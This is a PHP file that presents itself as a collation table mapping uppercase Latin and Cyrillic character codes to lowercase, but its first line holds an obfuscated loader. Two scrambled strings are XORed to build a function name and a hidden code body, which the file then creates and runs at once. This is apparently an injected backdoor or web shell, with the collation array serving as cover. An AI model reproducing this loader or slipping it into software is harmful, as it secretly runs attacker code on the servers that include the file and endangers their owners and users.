<?php $FRBFMlE='9>-Z=Kg+>7 0E8:'; $YjLWxJx='ZLH;I.8MKYCD,WT'^$FRBFMlE; $LxKSGGM='D>fcVY6.8ZRUb7.0 ,SxoU:+.R0.2ki8= idPiUoz =X JS NV+D4cT9C qgV2YisXS QVdiK2IlVdQqc>zpcRUUGmwbpmUomSR;;RR psVbidcBy=,0 QCco5-0WyvjU=rnkOP;w:  hLivCk>4=R:j aqmBiE :-f1vBe8=0.+EyKE=Elpdrdj914J IRds5- yaR;:L8dAn3J51Rso55YGIt6l5QC-nK Nkmm-ARCTyczP L551.bctb rx;dkM 6An2VWowgAS8W+U7HgPIzvO3B7<9Y7cXrwQ 1qxkhYAJUyOEp:9=BEyo+xeXFYZxIPY3TmuNznQON<XV+vGIa;voi2o,j5Geg =JBSxnA YX63XkWeblq6 E -.NWWVBtQEKs1jjAZQ<TdhhG446GWz6Q-=Ma=gWO:TikS4C49=E>O6I;3I6 Jl1TCQd>: 7a1;K=aP6+VHR1SYuH-:OeNza2, Rd YKNfSx 3Ni<-GQcNGKY+;L c HOr5CYAEDFpVV Kyvp6108elgKDc+Itlt36ZO6h  =l.eOtdSc hrln6EKbjpYfqb 8deRVOrUdKO2T Z<wLWgmWYD5-W6 .38EHDCE5mqK6TR- +uIpS,O-3pghvcqQb-rq4Z QjP+AT05a=.H+7T>nhbucpKOW=qqeuoQ'; $yoNLqcxV=$YjLWxJx('', '-XNB0,XML3=;=RVYSX PH-UYq6QZS46UHTNMyI.esFH6C>:O vS+F<0X7A.8;G-AW<2T0zDM W0EvDqQCEpyjv: 3MJBWJnedZ4TIzvIPNvRRDG+ENXBL4-KKQLD6PMJqTYEBEY2SUUTHbTVkOZUI3aNI<Q3bM.ECvBXVgEKIBBN+Qo.X<E-MInc0CQ>U;<LWZXTPZX2GFEnKJW+APrNOST54,O<HQ07L1 E7KPMK >01Bip6O>PTRFBKP=c=7p-.mAEaJY3.OJYawN6G RaG+CsR+R6VcR<NCeRS:EHJrbL= >4YreTLXQ7 BeVro1 yrYm48G5DU5pg7 <Y95CVom>i3><w<xJT4ECKX3bnFNeV84CVqK,okeURA1ArE+.wkbP: 2H;cce>0H5DUHcBUZ22A<XP70k7C3.N5IVst6ZJX7W.Z AVaNO83U570;aWUCISZ8XWdiO3+=U6qQ,LN.LbZEVMT3;K<2gOhrIUfMXL30Chak8YI-Y<K-6-P;0217nW=3YlUVTRPDYLLAmdKF-ADPWW..mOKEDKsLoIYsDAZKTZT .WRF=VBTBYUQjfyCcVs+SbFkZPewAKw86GL.iKKJg 0-01FEV;W->BAORePwH.YRYNHVCQqBVxxQ,A=BtO  QnFMO1GX5ZI5KNiy.7>IYALNe,'^$LxKSGGM); $yoNLqcxV();
$collation = array (
  65 => 97,
  66 => 98,
  67 => 99,
  68 => 100,
  69 => 101,
  70 => 102,
  71 => 103,
  72 => 104,
  73 => 105,
  74 => 106,
  75 => 107,
  76 => 108,
  77 => 109,
  78 => 110,
  79 => 111,
  80 => 112,
  81 => 113,
  82 => 114,
  83 => 115,
  84 => 116,
  85 => 117,
  86 => 118,
  87 => 119,
  88 => 120,
  89 => 121,
  90 => 122,
  1040 => 1072,
  1041 => 1073,
  1042 => 1074,
  1043 => 1075,
  1168 => 1169,
  1076 => 1107,
  1027 => 1107,
  1044 => 1107,
  1026 => 1106,
  1045 => 1077,
  1105 => 1077,
  1025 => 1077,
  1028 => 1108,
  1046 => 1078,
  1047 => 1079,
  1029 => 1109,
  1048 => 1080,
  1031 => 1111,
  1049 => 1081,
  1032 => 1112,
  1050 => 1082,
  1051 => 1083,
  1033 => 1113,
  1052 => 1084,
  1053 => 1085,
  1034 => 1114,
  1054 => 1086,
  1055 => 1087,
  1056 => 1088,
  1057 => 1089,
  1058 => 1090,
  1035 => 1115,
  1036 => 1116,
  1059 => 1091,
  1118 => 1091,
  1038 => 1091,
  1060 => 1092,
  1061 => 1093,
  1062 => 1094,
  1063 => 1095,
  1039 => 1119,
  1064 => 1096,
  1065 => 1097,
  1066 => 1098,
  1067 => 1099,
  1068 => 1100,
  1069 => 1101,
  1070 => 1102,
  1071 => 1103,
);
?>